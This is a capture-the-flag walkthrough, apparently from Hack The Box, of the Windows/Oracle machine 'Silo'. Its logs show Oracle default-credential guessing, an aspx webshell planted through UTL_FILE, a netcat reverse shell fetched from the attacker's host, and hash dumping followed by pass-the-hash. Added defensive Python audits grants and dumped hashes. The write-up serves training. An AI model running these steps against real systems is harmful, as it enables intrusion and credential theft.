Silo
Port scan
u505@naos:~/HTB/Machines/Silo$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.82
Starting masscan 1.0.5 at 2021-01-24 15:50:02 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 135/tcp on 10.10.10.82
Discovered open port 49155/tcp on 10.10.10.82
Discovered open port 49162/tcp on 10.10.10.82
Discovered open port 5985/tcp on 10.10.10.82
Discovered open port 49161/tcp on 10.10.10.82
Discovered open port 80/tcp on 10.10.10.82
Discovered open port 47001/tcp on 10.10.10.82
Discovered open port 139/tcp on 10.10.10.82
Discovered open port 445/tcp on 10.10.10.82
Discovered open port 49153/tcp on 10.10.10.82
Discovered open port 49154/tcp on 10.10.10.82
Discovered open port 49160/tcp on 10.10.10.82
Discovered open port 49152/tcp on 10.10.10.82
Discovered open port 1521/tcp on 10.10.10.82
u505@naos:~/HTB/Machines/Silo$ nmap -sC -sV silo
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-24 10:50 EST
Nmap scan report for silo (10.10.10.82)
Host is up (0.15s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  unknown
49155/tcp open  unknown
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8m33s, deviation: 0s, median: 8m33s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-01-24T16:02:18
|_  start_date: 2021-01-24T15:51:17

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 233.75 seconds
Windows enumeration
The box is a Windows Server 2012 R2, and WinRM (port 5985) is accessible. CrackMapExec also reports that SMB signing is not required and SMBv1 is enabled.
u505@naos:~/HTB/Machines/Silo$ crackmapexec smb 10.10.10.82
SMB         10.10.10.82     445    SILO             [*] Windows Server 2012 R2 Standard 9600 x64 (name:SILO) (domain:SILO) (signing:False) (SMBv1:True)
u505@naos:~/HTB/Machines/Silo$ crackmapexec smb 10.10.10.82 -u u505 -p abc
SMB         10.10.10.82     445    SILO             [*] Windows Server 2012 R2 Standard 9600 x64 (name:SILO) (domain:SILO) (signing:False) (SMBv1:True)
SMB         10.10.10.82     445    SILO             [-] SILO\u505:abc STATUS_LOGON_FAILURE
u505@naos:~/HTB/Machines/Silo$ sudo crackmapexec winrm 10.10.10.82
WINRM       10.10.10.82     5985   NONE             [*] None (name:10.10.10.82) (domain:None)
WINRM       10.10.10.82     5985   NONE             [*] http://10.10.10.82:5985/wsman
Web enumeration
The web server serves the default IIS page. Dirsearch doesn't find anything interesting.
u505@naos:~/HTB/Machines/Silo$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common.txt -e "txt,htm,html,aspx" -f -t 100 -u http://silo.htb
/opt/utils/dirsearch/thirdparty/requests/__init__.py:91: RequestsDependencyWarning: urllib3 (1.26.2) or chardet (4.0.0) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({}) doesn't match a supported "

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: txt, htm, html, aspx | HTTP method: GET | Threads: 100 | Wordlist size: 27669

Error Log: /opt/utils/dirsearch/logs/errors-21-01-24_11-30-34.log

Target: http://silo.htb/

Output File: /opt/utils/dirsearch/reports/silo.htb/_21-01-24_11-30-35.txt

[11:30:35] Starting:
[11:30:45] 403 -    1KB - /aspnet_client/
[11:30:45] 301 -  153B  - /aspnet_client  ->  http://silo.htb/aspnet_client/

Task Completed
Oracle enumeration
With ODAT (Oracle Database Attacking Tool) we enumerate valid SIDs. The default SID XE of Oracle Express Edition is found.
u505@naos:~/HTB/Machines/Silo$ python3 /opt/utils/odat/odat.py sidguesser -s 10.10.10.82 --sids-file /opt/utils/odat/sids.txt
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...
[+] 'XEXDB' is a valid SID. Continue...
100% |########################################################################################################################| Time: 00:01:02
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |########################################################################################################################| Time: 00:00:02
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue...
100% |########################################################################################################################| Time: 00:00:55
[+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB
With ODAT again, we enumerate default user/password pairs, and scott/tiger is found.
u505@naos:~/HTB/Machines/Silo$ python3 /opt/utils/odat/odat.py passwordguesser -s 10.10.10.82 -d XE --accounts-file /opt/utils/odat/accounts/accounts.txt
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
The login cis has already been tested at least once. What do you want to do:
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[+] Valid credentials found: scott/tiger. Continue...
100% |########################################################################################################################| Time: 00:03:39
[+] Accounts found on 10.10.10.82:1521/XE: scott/tiger
Access database
With the scott/tiger credentials we are able to connect to the Oracle engine with SQL*Plus as SYSDBA.
u505@naos:~/HTB/Machines/Silo$ sqlplus scott/tiger@10.10.10.82/XE as sysdba
SQL*Plus: Release 21.0.0.0.0 - Production on Sun Jan 24 14:54:26 2021 Version 21.1.0.0.0
Copyright (c) 1982, 2020, Oracle. All rights reserved.
Connected to: Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL> quit
Disconnected from Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
Upload file
The Oracle engine runs with high privileges, so we try to write a file into the IIS web root through a directory object and UTL_FILE.
u505@naos:~/HTB/Machines/Silo$ sqlplus scott/tiger@10.10.10.82/XE as sysdba
SQL*Plus: Release 21.0.0.0.0 - Production on Sun Jan 24 22:39:20 2021 Version 21.1.0.0.0
Copyright (c) 1982, 2020, Oracle. All rights reserved.
Connected to: Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL> CREATE OR REPLACE DIRECTORY CTEST AS 'C:\inetpub\wwwroot';
Directory created.
SQL> GRANT READ ON DIRECTORY CTEST TO PUBLIC;
Grant succeeded.
SQL> DECLARE
  out_File UTL_FILE.FILE_TYPE;
BEGIN
  out_File := UTL_FILE.FOPEN('CTEST', 'u505.txt' , 'W');
  UTL_FILE.PUT_LINE(out_file , 'Hi u505!');
  UTL_FILE.PUT_LINE(out_file , 'Line2!');
  UTL_FILE.FCLOSE(out_file);
END;
/
PL/SQL procedure successfully completed.
The PL/SQL block runs successfully, and the file is now served by IIS.
u505@naos:~/HTB/Machines/Silo$ curl http://10.10.10.82/u505.txt
Hi u505!
Line2!
An alternative is to use ODAT's automated file upload.
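The two statements above (a directory object pointing at the IIS web root, then a grant on it to PUBLIC) are exactly what a DBA should look for when reviewing an instance. The following is an added example, not code from the original write-up: a small audit that takes rows shaped like DBA_DIRECTORIES and DBA_TAB_PRIVS (the sample rows are constructed to mirror the page's statements, and the query text in the docstring is assumed) and flags directory objects under sensitive file-system roots or granted to PUBLIC.

```python
"""Audit Oracle DIRECTORY objects and their grants for file-system exposure.

Added example, not part of the original write-up. The page's CREATE DIRECTORY
and GRANT statements turn the database into a file-writer for the IIS web
root; the check below flags that pattern. The sample rows are constructed to
mirror those statements; on a real instance they would come from the
DBA_DIRECTORIES and DBA_TAB_PRIVS views (assumed query, run as a DBA):

    SELECT owner, directory_name, directory_path FROM dba_directories;
    SELECT grantee, table_name, privilege FROM dba_tab_privs
     WHERE table_name IN (SELECT directory_name FROM dba_directories);
"""
from pathlib import PureWindowsPath

# File-system roots where a directory object is a red flag (assumed list;
# add your own web roots, scheduled-task folders, etc.).
SENSITIVE_ROOTS = (
    r"C:\inetpub",   # IIS content: write access there = arbitrary web pages
    r"C:\Windows",
    r"C:\Users",
)

# Constructed rows: (owner, directory_name, directory_path)
DIRECTORIES = [
    ("SYS", "CTEST", r"C:\inetpub\wwwroot"),
    ("SYS", "DATA_PUMP_DIR", r"C:\oraclexe\app\oracle\admin\XE\dpdump"),
]
# Constructed rows: (grantee, directory_name, privilege)
GRANTS = [
    ("PUBLIC", "CTEST", "READ"),
    ("SCOTT", "CTEST", "WRITE"),
]


def is_under(path: str, root: str) -> bool:
    """Case-insensitive 'path is root or lies beneath it' using Windows path rules."""
    p = [s.lower() for s in PureWindowsPath(path).parts]
    r = [s.lower() for s in PureWindowsPath(root).parts]
    return p[:len(r)] == r


def audit_directories(directories, grants, roots=SENSITIVE_ROOTS):
    """Return a list of finding strings (empty list = nothing to report)."""
    by_dir = {}
    for grantee, name, priv in grants:
        by_dir.setdefault(name.upper(), []).append((grantee.upper(), priv.upper()))

    findings = []
    for owner, name, path in directories:
        hits = [root for root in roots if is_under(path, root)]
        for root in hits:
            findings.append(f"{name} ({owner}): path {path} is under sensitive root {root}")
        for grantee, priv in by_dir.get(name.upper(), []):
            if grantee == "PUBLIC":
                findings.append(f"{name}: {priv} granted to PUBLIC (every database user)")
            elif priv in ("WRITE", "EXECUTE") and hits:
                findings.append(f"{name}: {priv} granted to {grantee} on a sensitive path")
    return findings


if __name__ == "__main__":
    for finding in audit_directories(DIRECTORIES, GRANTS):
        print(finding)
```

Note that the write on this page succeeded with only READ granted, because a SYSDBA session bypasses directory grants entirely; the grant audit therefore complements, and does not replace, running the Oracle service under a low-privilege Windows account and not letting default accounts such as scott connect as SYSDBA.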
Upload webshell
Knowing that we can upload files to IIS, we upload an aspx webshell.
u505@naos:~/HTB/Machines/Silo$ cp /usr/share/webshells/aspx/cmdasp.aspx ./
We wrap each line of the file in a PL/SQL UTL_FILE.PUT_LINE call.
u505@naos:~/HTB/Machines/Silo$ cp cmdaspx.sql cmdasp.aspx.sql
u505@naos:~/HTB/Machines/Silo$ vi cmdasp.aspx.sql
u505@naos:~/HTB/Machines/Silo$ cat cmdasp.aspx.sql
DECLARE
out_File UTL_FILE.FILE_TYPE;
BEGIN
out_File := UTL_FILE.FOPEN('CTEST', 'cmd.aspx' , 'W');
UTL_FILE.PUT_LINE(out_file , '<%@ Page Language="C#" Debug="true" Trace="false" %>');
UTL_FILE.PUT_LINE(out_file , '<%@ Import Namespace="System.Diagnostics" %>');
UTL_FILE.PUT_LINE(out_file , '<%@ Import Namespace="System.IO" %>');
...
UTL_FILE.PUT_LINE(out_file , '</form>');
UTL_FILE.PUT_LINE(out_file , '</body>');
UTL_FILE.PUT_LINE(out_file , '</HTML>');
UTL_FILE.FCLOSE(out_file);
END;
We run the PL/SQL on sqlplus.
SQL> @cmdasp.aspx.sql
 46  /
PL/SQL procedure successfully completed.
Browsing to the uploaded URL gives us the webshell, with code execution on the server.
Reverse shell
u505@naos:~/HTB/Machines/Silo$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
We copy nc.exe to our web folder and start a Python web server.
u505@naos:~/HTB/Machines/Silo/web$ cp /opt/utils/nc.exe/nc.exe ./
u505@naos:~/HTB/Machines/Silo/web$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...
From the webshell, download the nc executable onto the target.
powershell -c "Invoke-WebRequest -Uri http://10.10.14.11/nc.exe -OutFile C:\temp\nc.exe"
u505@naos:~/HTB/Machines/Silo/web$ sudo python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.82 - - [25/Jan/2021 11:33:07] "GET /nc.exe HTTP/1.1" 200 -
Call nc to open the reverse shell.
c:\temp\nc.exe 10.10.14.11 4444 -e cmd
u505@naos:~/HTB/Machines/Silo$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.82.
Ncat: Connection from 10.10.10.82:49164.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv> whoami
whoami
iis apppool\defaultapppool
User flag
c:\Users\Phineas\Desktop> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 78D4-EA4D

 Directory of c:\Users\Phineas\Desktop

01/07/2018  02:03 PM    <DIR>          .
01/07/2018  02:03 PM    <DIR>          ..
01/05/2018  10:56 PM               300 Oracle issue.txt
01/04/2018  09:41 PM                32 user.txt
               2 File(s)            332 bytes
               2 Dir(s)  15,471,681,536 bytes free

c:\Users\Phineas\Desktop> type user.txt
type user.txt
<USER_FLAG>
There is a file, Oracle issue.txt, that seems interesting.
Privileges escalation
c:\Users\Phineas\Desktop> type "Oracle issue.txt"
type "Oracle issue.txt"
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):
Dropbox link provided to vendor (and password under separate cover).
Dropbox link https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0
link password: ▒%Hm8646uC$
There is a link and a password, but the first character of the password is not readable in this shell.
Get a copy of Oracle file
Start an SMB server (Impacket smbserver.py) on our machine.
u505@naos:~/HTB/Machines/Silo/web$ sudo python3 /opt/utils/impacket/examples/smbserver.py -username u505 -password u505 u505 ./ -smb2support
[sudo] password for u505:
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Map the network share on the target.
c:\Users\Phineas\Desktop> net use x: \\10.10.14.11\u505 /USER:u505 u505
net use x: \\10.10.14.11\u505 /USER:u505 u505
The command completed successfully.
Copy the file to our local machine.
c:\Users\Phineas\Desktop> copy "Oracle issue.txt" X:\
copy "Oracle issue.txt" X:\
        1 file(s) copied.
Check the character encoding of the file.
u505@naos:~/HTB/Machines/Silo$ cp web/Oracle\ issue.txt ./
u505@naos:~/HTB/Machines/Silo$ file Oracle\ issue.txt
Oracle issue.txt: ISO-8859 text, with CRLF line terminators
The file is encoded in an ISO-8859 (Latin) charset rather than UTF-8. We convert it to UTF-8, and the password becomes readable.
u505@naos:~/HTB/Machines/Silo$ iconv -f ISO-8859-15 -t UTF-8 Oracle\ issue.txt
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):
Dropbox link provided to vendor (and password under separate cover).
Dropbox link https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0
link password: £%Hm8646uC$
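The unreadable first character is a pure encoding problem: byte 0xA3 is '£' in ISO-8859-1/-15, but on its own it is not valid UTF-8, so a UTF-8 terminal shows a replacement glyph. The following is an added example, not part of the original write-up, that does what the iconv step above does, but detects the offending byte first and only accepts a strict decode (the sample bytes are constructed to reproduce the password line; the candidate encoding list is an assumption).

```python
"""Decode a text file that is not UTF-8 without losing characters.

Added example, not part of the original write-up. The 'Oracle issue.txt' note
above is ISO-8859 encoded: byte 0xA3 is '£' there, but a lone 0xA3 is invalid
UTF-8, so a UTF-8 terminal rendered it as '▒'. The sample bytes below are
constructed to reproduce that password line.
"""

# Constructed: the note's last line as stored on disk (latin-9 bytes, CRLF).
SAMPLE = b"link password: \xa3%Hm8646uC$\r\n"

# Strict decoding in this order: UTF-8 first, then the Western European
# 8-bit encodings a Windows host is likely to have used. Assumed list.
CANDIDATE_ENCODINGS = ("utf-8", "iso-8859-15", "cp1252")


def find_invalid_utf8(data: bytes):
    """Return (offset, byte) of the first byte that breaks UTF-8, or None."""
    try:
        data.decode("utf-8")
    except UnicodeDecodeError as err:
        return err.start, data[err.start]
    return None


def decode_best_effort(data: bytes):
    """Return (encoding, text) from the first candidate that decodes strictly.

    Strict mode matters: errors='replace' would silently turn the byte into
    U+FFFD and the password would be lost for good.
    """
    for enc in CANDIDATE_ENCODINGS:
        try:
            return enc, data.decode(enc)
        except UnicodeDecodeError:
            continue
    raise ValueError("no candidate encoding decodes the data cleanly")


def to_utf8(data: bytes) -> bytes:
    """Equivalent of `iconv -f <detected> -t UTF-8` for the sample."""
    _, text = decode_best_effort(data)
    return text.encode("utf-8")


def extract_password(text: str) -> str:
    """Pull the value after 'link password:' from the note."""
    marker = "link password:"
    return text.split(marker, 1)[1].strip()


if __name__ == "__main__":
    print("first bad UTF-8 byte:", find_invalid_utf8(SAMPLE))
    enc, text = decode_best_effort(SAMPLE)
    print(enc, "->", extract_password(text))
```

ISO-8859-15 and cp1252 agree on 0xA3, so either would have recovered this password; they differ on a handful of other bytes (0xA4 is '€' in one and '¤' in the other), which is why the order of candidates is worth thinking about for a file that came from a Windows box.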
Download dump
The zip file contains a .dmp file of 1 GB.
u505@naos:~/HTB/Machines/Silo$ file web/SILO-20180105-221806.dmp
web/SILO-20180105-221806.dmp: MS Windows 64bit crash dump, full dump, 261996 pages
The file is a Windows full memory dump (the kind written on a blue screen of death).
Root flag with administrator credential hashes
With the forensic tool Volatility 3, the SAM hashes can be extracted from the dump.
u505@naos:~/HTB/Machines/Silo/web$ python /opt/utils/volatility3/vol.py -f SILO-20180105-221806.dmp windows.hashdump.Hashdump
Volatility 3 Framework 2.0.0
Progress:  100.00               PDB scanning finished
User            rid     lmhash  nthash

Administrator   500     aad3b435b51404eeaad3b435b51404ee        9e730375b7cbcebf74ae46481e07b0c7
Guest   501     aad3b435b51404eeaad3b435b51404ee        31d6cfe0d16ae931b73c59d7e0c089c0
Phineas 1002    aad3b435b51404eeaad3b435b51404ee        8eacdd67b77749e65d3b3d5c110b0969
We can log in as administrator by passing the NT hash with evil-winrm or psexec.
u505@naos:~/HTB/Machines/Silo$ evil-winrm -i 10.10.10.82 -u administrator -H 9e730375b7cbcebf74ae46481e07b0c7
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
<ROOT_FLAG>
*Evil-WinRM* PS C:\Users\Administrator\Documents> exit
Info: Exiting with code 0
Alternative root flag with administrator password
In the dump's LSA (Local Security Authority) secrets there is a cleartext password in the DefaultPassword entry (used for automatic logon).
u505@naos:~/HTB/Machines/Silo/web$ python /opt/utils/volatility3/vol.py -f SILO-20180105-221806.dmp windows.lsadump.Lsadump
Volatility 3 Framework 2.0.0
Progress:  100.00               PDB scanning finished
Key     Secret  Hex

DefaultPassword DoNotH@ckMeBro! 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 6f 00 4e 00 6f 00 74 00 48 00 40 00 63 00 6b 00 4d 00 65 00 42 00 72 00 6f 00 21 00 00 00
DPAPI_SYSTEM    ,Ï%�14�®C-��¬ò§tmC¨¦©Bb÷UpH»}�þyI½  2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 cf 25 94 31 34 9e ae 43 2d 8b 87 ac f2 a7 74 1c 6d ec 1c 04 08 43 a8 a6 a9 42 62 f7 55 70 48 bb 17 7d 82 fe 79 49 02 bd 00 00 00 00
We test whether this is the administrator password.
u505@naos:~/HTB/Machines/Silo$ crackmapexec smb 10.10.10.82 -u administrator -p 'DoNotH@ckMeBro!'
SMB 10.10.10.82 445 SILO [*] Windows Server 2012 R2 Standard 9600 x64 (name:SILO) (domain:SILO) (signing:False) (SMBv1:True)
SMB 10.10.10.82 445 SILO [+] SILO\administrator:DoNotH@ckMeBro! (Pwn3d!)
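A defender triaging the same dump can reach the same conclusions offline, without touching the host: the hashdump section above shows which accounts have a blank password or still store an LM hash, and the LSA DefaultPassword secret can be checked against the dumped NT hashes by computing MD4 over the UTF-16LE password. The following is an added example, not code from the original write-up; the hashdump rows and the plaintext are copied from the page's own output, and MD4 is implemented inline because hashlib's md4 is often disabled under OpenSSL 3.

```python
"""Offline triage of the credential material recovered from the memory dump.

Added example (not part of the original write-up): parses the hashdump table,
flags blank passwords and stored LM hashes, and checks whether the plaintext
from the LSA DefaultPassword secret is the same credential as one of the
dumped NT hashes. MD4 is implemented here because hashlib's md4 is often
disabled under OpenSSL 3. The sample values are copied from the page output.
"""
import struct

# Volatility hashdump output from the page (User rid lmhash nthash).
HASHDUMP = """\
User rid lmhash nthash
Administrator 500 aad3b435b51404eeaad3b435b51404ee 9e730375b7cbcebf74ae46481e07b0c7
Guest 501 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0
Phineas 1002 aad3b435b51404eeaad3b435b51404ee 8eacdd67b77749e65d3b3d5c110b0969
"""
# Plaintext from the lsadump DefaultPassword secret on the page.
LSA_DEFAULT_PASSWORD = "DoNotH@ckMeBro!"

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": LM storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "": account has a blank password

MASK = 0xFFFFFFFF


def _rotl(x, s):
    return ((x << s) | (x >> (32 - s))) & MASK


def _f(x, y, z):
    return (x & y) | (~x & z)


def _g(x, y, z):
    return (x & y) | (x & z) | (y & z)


def _h(x, y, z):
    return x ^ y ^ z


# (function, additive constant, X[] index order, shift amounts) per MD4 round (RFC 1320).
_ROUNDS = (
    (_f, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
    (_g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
    (_h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
)


def md4(data: bytes) -> bytes:
    """Plain MD4 digest (RFC 1320); NT hashes are MD4 over the UTF-16LE password."""
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for func, k, order, shifts in _ROUNDS:
            for i, idx in enumerate(order):
                a = (-i) % 4  # the word being updated cycles a, d, c, b
                b, c, d = v[(a + 1) % 4], v[(a + 2) % 4], v[(a + 3) % 4]
                v[a] = _rotl((v[a] + func(b, c, d) + x[idx] + k) & MASK, shifts[i % 4])
        state = [(s + w) & MASK for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    return md4(password.encode("utf-16-le")).hex()


def parse_hashdump(text: str):
    """Turn the hashdump table into dicts; the header line is skipped."""
    rows = []
    for line in text.splitlines()[1:]:
        if not line.strip():
            continue
        user, rid, lm, nt = line.split()
        rows.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return rows


def triage(rows, plaintexts):
    """Return human-readable findings about the dumped accounts."""
    findings = []
    for r in rows:
        if r["nt"] == EMPTY_NT:
            findings.append(f"{r['user']}: blank password (NT hash of empty string)")
        if r["lm"] != EMPTY_LM:
            findings.append(f"{r['user']}: LM hash stored, trivially crackable")
        for pw in plaintexts:
            if nt_hash(pw) == r["nt"]:
                findings.append(f"{r['user']}: NT hash equals a plaintext from the LSA secrets")
    return findings


if __name__ == "__main__":
    for line in triage(parse_hashdump(HASHDUMP), [LSA_DEFAULT_PASSWORD]):
        print(line)
```

For this dump the triage reports that Guest has a blank password and that the Administrator NT hash is exactly the hash of the DefaultPassword secret, which is what the crackmapexec check above confirms against the live host. The broader lesson for the people who produced the dump is that a full memory dump handed to a vendor carries the SAM and LSA secrets of the machine, so it needs the same handling as the passwords themselves.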
Access as administrator with the recovered password.
u505@naos:~/HTB/Machines/Silo$ evil-winrm -i 10.10.10.82 -u administrator -p 'DoNotH@ckMeBro!'
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
silo\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> exit
Info: Exiting with code 0
References
Daniel Simao 10:24, 25 January 2021 (EST)